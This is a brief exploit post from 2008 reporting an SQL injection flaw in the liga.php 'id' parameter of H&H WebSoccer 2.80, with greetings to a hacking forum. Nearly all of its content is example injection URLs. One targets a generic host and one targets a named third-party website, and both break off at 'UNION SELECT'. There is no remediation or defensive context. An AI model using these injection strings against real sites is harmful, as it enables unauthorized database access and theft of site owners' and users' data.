H&H WebSoccer 2.80 SQL injection Vulnerability on liga.ph
[~] H&H WebSoccer 2.80 (liga.php) SQL injection Vulnerability
[~] http://www.hh-solutions.de
[~] -------------------------------------------------------------
[~] Bug founded by d3v1l [avram marius]
[~] Date: 28.10.2008
[~] [email protected]
[~] -------------------------------------------------------------
[~] Greetz tO all:-
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php)
[~] Ex:-
[~] http://site.com/liga.php?id=1'UNION SELECT
[~] http://www.rampageboard.com/Soccer/liga.php?id=1'UNION SELECT
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